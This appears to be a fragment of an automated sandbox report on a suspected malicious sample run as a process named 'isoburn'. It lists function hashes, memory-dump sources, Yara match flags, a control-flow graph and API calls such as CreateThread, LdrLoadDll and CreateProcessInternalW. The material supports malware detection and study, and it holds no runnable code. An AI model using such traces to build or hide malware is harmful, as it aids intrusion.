                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 32d3b8a6339897519250e177f806bec4cd78faae36524adb305bf29b901fe47a
                                                            • Instruction ID: e0642929a6b3e3023f1ba353b68cb608ec2b90370b0142b492bdfbf6ac3b92c7
                                                            • Opcode Fuzzy Hash: 32d3b8a6339897519250e177f806bec4cd78faae36524adb305bf29b901fe47a
                                                            • Instruction Fuzzy Hash: C6900221311D0086F200B5684C18B0700498BD0307F55C125A0155598CC915D9615521
                                                            Function 048F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9131e74f8075f3019315fbb913117083f9f857aa89ac3846cc03ab46f64c7ea8
                                                            • Instruction ID: 362683cb89db15de210f27edb290ce046a0869e054508d775a2bddd608c8e608
                                                            • Opcode Fuzzy Hash: 9131e74f8075f3019315fbb913117083f9f857aa89ac3846cc03ab46f64c7ea8
                                                            • Instruction Fuzzy Hash: 4590026134190486F100B1584418B060049CBE1305F55C025E1065598D8619DD526126
                                                            Function 048F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 462485b716e0aeed2137245e2a2eb72a8b8552fe12f30019b4a86dcce24dffa2
                                                            • Instruction ID: 79d71e39199ecfdb452980cd8461a098d7b34dea3af4a22bf61af803590033a7
                                                            • Opcode Fuzzy Hash: 462485b716e0aeed2137245e2a2eb72a8b8552fe12f30019b4a86dcce24dffa2
                                                            • Instruction Fuzzy Hash: 6F900225311900472105F5580708507008A8BD5355355C031F1016594CD621D9615121
                                                            Function 048F2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c19e678ffeaa8f16b170f89c63391f312e645de924ca6ef03d2b1f7b47194cd7
                                                            • Instruction ID: 1439990579765ab92143ea7f3399d21aba4cc72f698318d271216c6ec69796db
                                                            • Opcode Fuzzy Hash: c19e678ffeaa8f16b170f89c63391f312e645de924ca6ef03d2b1f7b47194cd7
                                                            • Instruction Fuzzy Hash: 2C900225321900462145F558060850B04899BD6355395C025F14175D4CC621D9655321
                                                            Function 048F2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1c25154ebbe79c2abe80d8119f8c3dcf57e854d2777d9fd2e153833971282233
                                                            • Instruction ID: 771d0677f7157e42f5d85485d59492898e197f88654e4fda1d7272aa7c835233
                                                            • Opcode Fuzzy Hash: 1c25154ebbe79c2abe80d8119f8c3dcf57e854d2777d9fd2e153833971282233
                                                            • Instruction Fuzzy Hash: 9F90023170590846F150B158441874600498BD0305F55C021A0025698D8755DB5576A1
                                                            Function 048F2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8199e775ee686bcd6b87d17a8fc84e8b9eac6b3c59e091f4ecbe85957a04b639
                                                            • Instruction ID: 70c38a305123d2fec58c16777f5ac2102b5730a99810bec3127a8e946d7c378b
                                                            • Opcode Fuzzy Hash: 8199e775ee686bcd6b87d17a8fc84e8b9eac6b3c59e091f4ecbe85957a04b639
                                                            • Instruction Fuzzy Hash: ED90023130594886F140B1584408A4600598BD0309F55C021A00656D8D9625DE55B661
                                                            Function 048F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: beaeb938a6d0ee90b09a205f9ca5a10c8ce8061224bf7f053037f69b50200620
                                                            • Instruction ID: 197760d4c6deb7bae3e082f9c41d087bf813751abe054a5d37e77fcd96976bdc
                                                            • Opcode Fuzzy Hash: beaeb938a6d0ee90b09a205f9ca5a10c8ce8061224bf7f053037f69b50200620
                                                            • Instruction Fuzzy Hash: D890023130190846F180B158440864A00498BD1305F95C025A0026698DCA15DB5977A1
                                                            Function 048F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 80f3e16ad28b8644231422cbbec68578471c567368fc3c56eecd30b864842b26
                                                            • Instruction ID: ea27cd5728cb52555cec282a3b5a34c6985c4fae8cdb6d5d347265309f92ebda
                                                            • Opcode Fuzzy Hash: 80f3e16ad28b8644231422cbbec68578471c567368fc3c56eecd30b864842b26
                                                            • Instruction Fuzzy Hash: 67900261302900476105B1584418616404E8BE0305B55C031E10155D4DC525D9916125
                                                            Function 048F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 288544b5839d5cb4fa991f17a5b973130935eeef3ed42229358dd43002163777
                                                            • Instruction ID: f162a06e11172bfd17370284740806adecc3d42fe65170b7b534f8ae6a210e1f
                                                            • Opcode Fuzzy Hash: 288544b5839d5cb4fa991f17a5b973130935eeef3ed42229358dd43002163777
                                                            • Instruction Fuzzy Hash: 65900231705A0446F100B158451870610498BD0305F65C421A04255ACD8795DA5165A2
                                                            Function 048F39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 51ff1d585b12b013e0de8cabe01b575682e46d85018ead8bb45b2a24943c05d1
                                                            • Instruction ID: 0fe053e005be1b7432872ec92275d6334436208120901b59fdf74b4f83505512
                                                            • Opcode Fuzzy Hash: 51ff1d585b12b013e0de8cabe01b575682e46d85018ead8bb45b2a24943c05d1
                                                            • Instruction Fuzzy Hash: B290022134595146F150B15C44086164049ABE0305F55C031A08155D8D8555D9556221
                                                            Function 006F9E36 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 134threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 28 6f9e36-6f9e37 29 6f9e0c-6f9e11 28->29 30 6f9e39-6fa152 28->30 32 6f9e13-6f9e2f call 71ca47 CreateThread 29->32 33 6f9e30-6f9e35 29->33 31 6fa15c-6fa163 30->31 34 6fa19e 31->34 35 6fa165-6fa19c 31->35 37 6fa1a5-6fa1af 34->37 35->31 39 6fa1e7-6fa1f0 37->39 40 6fa1b1-6fa1cb 37->40 43 6fa206-6fa210 39->43 44 6fa1f2-6fa204 39->44 41 6fa1cd-6fa1d1 40->41 42 6fa1d2-6fa1d4 40->42 41->42 45 6fa1d6-6fa1df 42->45 46 6fa1e5 42->46 47 6fa221-6fa22d 43->47 44->39 45->46 46->37 48 6fa22f-6fa23b 47->48 49 6fa23d-6fa241 47->49 48->47 50 6fa25c-6fa274 49->50 51 6fa243-6fa25a 49->51 53 6fa285-6fa291 50->53 51->49 54 6fa2a8-6fa2b2 53->54 55 6fa293-6fa2a6 53->55 56 6fa2c3-6fa2cf 54->56 55->53 58 6fa2e5-6fa2ee 56->58 59 6fa2d1-6fa2e3 56->59 60 6fa2f4-6fa2f7 58->60 61 6fa510-6fa517 58->61 59->56 65 6fa2fd-6fa304 60->65 63 6fa54a-6fa551 61->63 64 6fa519-6fa548 61->64 66 6fa5c3-6fa5cd 63->66 67 6fa553-6fa55d 63->67 64->61 68 6fa32b-6fa335 65->68 69 6fa306-6fa329 65->69 72 6fa5de-6fa5e7 66->72 70 6fa56e-6fa57a 67->70 71 6fa346-6fa352 68->71 69->65 75 6fa58d call 71b0e0 70->75 76 6fa57c-6fa58b 70->76 77 6fa365-6fa36c 71->77 78 6fa354-6fa363 71->78 73 6fa5fe-6fa607 72->73 74 6fa5e9-6fa5fc 72->74 74->72 86 6fa592-6fa59e 75->86 83 6fa55f-6fa568 76->83 80 6fa36e-6fa391 77->80 81 6fa393-6fa39d 77->81 78->71 80->77 85 6fa3ae-6fa3ba 81->85 83->70 87 6fa3bc-6fa3c9 85->87 88 6fa3cb-6fa3da 85->88 86->66 89 6fa5a0-6fa5c1 86->89 87->85 90 6fa40d-6fa417 88->90 91 6fa3dc-6fa3e3 88->91 89->86 95 6fa428-6fa434 90->95 93 6fa408 91->93 94 6fa3e5-6fa3fb 91->94 93->61 96 6fa3fd-6fa403 94->96 97 6fa406 94->97 98 6fa44a-6fa454 95->98 99 6fa436-6fa448 95->99 96->97 97->91 100 6fa465-6fa471 98->100 99->95 102 6fa493-6fa499 100->102 103 6fa473-6fa480 100->103 106 6fa49d-6fa4a4 102->106 104 6fa482-6fa48b 103->104 105 6fa491 103->105 104->105 105->100 108 6fa4c9-6fa4d3 106->108 109 6fa4a6-6fa4bc 106->109 112 6fa4e4-6fa4ed 108->112 110 6fa4be-6fa4c4 109->110 111 6fa4c7 109->111 110->111 111->106 113 6fa4ef-6fa4fb 112->113 114 6fa50b 112->114 115 6fa4fd-6fa503 113->115 116 6fa509 113->116 114->58 115->116 116->112
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                            • API String ID: 2422867632-999386047
                                                            • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                            • Instruction ID: 08143212bab712e586c099be74831e10063a07b75b052f89923a7232acad75b5
                                                            • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                            • Instruction Fuzzy Hash: A38167B0D05668CBEB20CF85C9597DEBAB1BB45308F1081D9D25C3B291C7BA1A89CF95
                                                            Function 0070F3F9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                            • Instruction ID: fce53e1dff7d2fd2873bbd9a224eeb2b8565f2419cdfc1e17b05728d7622d764
                                                            • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                            • Instruction Fuzzy Hash: 7C4151B5A0020ADFDB10DFD8D8809EFB7B9BF88304B108569E905E7255D774AE45CBA0
                                                            Function 0070F400 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                            • Instruction ID: e71d30db6cc16e74754cdf3511f9256f0511133ceb0a732e7a595777297a217b
                                                            • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                            • Instruction Fuzzy Hash: D9312FB5A0060ADFDB10DFD8C8809EFB7B9BF88304B108559E905AB255D775EE458BA0
                                                            Function 00713980 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00713A5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: wininet.dll
                                                            • API String ID: 3472027048-3354682871
                                                            • Opcode ID: ee84ed086841c8dcd249fce5eeaf5ff03a74d5cba86a6b0b6845b6f9387c7c9f
                                                            • Instruction ID: fc2dbcd139035b38c367ddbc3c74c10170345a0e980462a70fc4fdc02038051d
                                                            • Opcode Fuzzy Hash: ee84ed086841c8dcd249fce5eeaf5ff03a74d5cba86a6b0b6845b6f9387c7c9f
                                                            • Instruction Fuzzy Hash: C231B2B1600605BBD714DFA8CC84FEBB7B8EF88710F50411EF5596B281D774AA80CBA4
                                                            Function 00704460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007044D2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction ID: e348a0c7cf2a8148914fa79ad850b2079d39249c5f273324b865cdd7e59c00fb
                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction Fuzzy Hash: 41010CB5E4020DEBDB10DAE4DC46FDDB3B89B54708F0042A5BA0897281F635EA588B91
                                                            Function 007197B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0070820E,00000010,?,?,?,00000044,?,00000010,0070820E,?,?,?), ref: 00719813
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction ID: 1da29ac5a5fda2b590404879091dd7123e0e2d9d6f6d96d1eea0dc9ba465c49d
                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction Fuzzy Hash: F101C4B2200208BBCB44DE8DDC81EDB77EDAF8C750F008108BA09E3241D630F8518BA4
                                                            Function 006F9DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                            • Instruction ID: 756aa468c4442910728e68a390ea56e0c0011921ce817b78dc404a57851e45b3
                                                            • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                            • Instruction Fuzzy Hash: 41F0307338021876D26061E99C02FD7B69C8B85BA1F140015F70CEA2C0D9A5B84142A9
                                                            Function 006F9DDC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                            • Instruction ID: 23bcf66d2ab1edacd7e4e205b69c51cf331df4c1b854079bbc634f6468ab417b
                                                            • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                            • Instruction Fuzzy Hash: 07F06D7228131872E27062A98C43FD7769C8F95BA1F140019F708EB2C0DAA5B88182F9
                                                            Function 007196D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00701969,?,?,00701969,oUq,?,?,00701969,oUq,00001000,?,?,00000000), ref: 0071970C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction ID: ebf361ae5c8e0041f3d295d4756ba0b203b9d4b91d3e06b759871b6398767759
                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction Fuzzy Hash: 4CE0ED76204204BBD714EE59DC45EEB77EDDFC5750F004419F909A7282D671B91087B5
                                                            Function 00719720 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,00703CE4,000000F4), ref: 0071975C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction ID: 031b7f6f2af9984e5a0157a6c18494acde987160f1fd8bc65e0ac8e0d76df84d
                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction Fuzzy Hash: 50E06D72200209BBD614EE58DC45FEB37ADDFC9750F004418FA08A7242C671B95086B4
                                                            Function 00708250 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0070827C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                            • Instruction ID: 1dd4cb361a67171b0111ec9af02387fc20b70839f39d757ad743124662105fab
                                                            • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                            • Instruction Fuzzy Hash: 5DE02675200208E7EF606AA8DC46FA2339CAB48728F4D0760BD5CCB2C2EA3CF8418190
                                                            Function 00708037 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00701C50,00717EAF,oUq,00701C1D), ref: 00708073
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                            • Instruction ID: cfce3486cfa50e2df5ae608868347a80e3e87208d30391212385c5b6c0db114c
                                                            • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                            • Instruction Fuzzy Hash: 6CE0C2B1641104AEF360AAB89C0BFA5329C6BA4754F4000A8B608EB2C2DB75E0008128
                                                            Function 00708040 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00701C50,00717EAF,oUq,00701C1D), ref: 00708073
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                            • Instruction ID: 9283a618e8a4c5e5e3289c83f4eae45e0ed3e2b0e80d9fe9bcb16b5d02d8ef25
                                                            • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
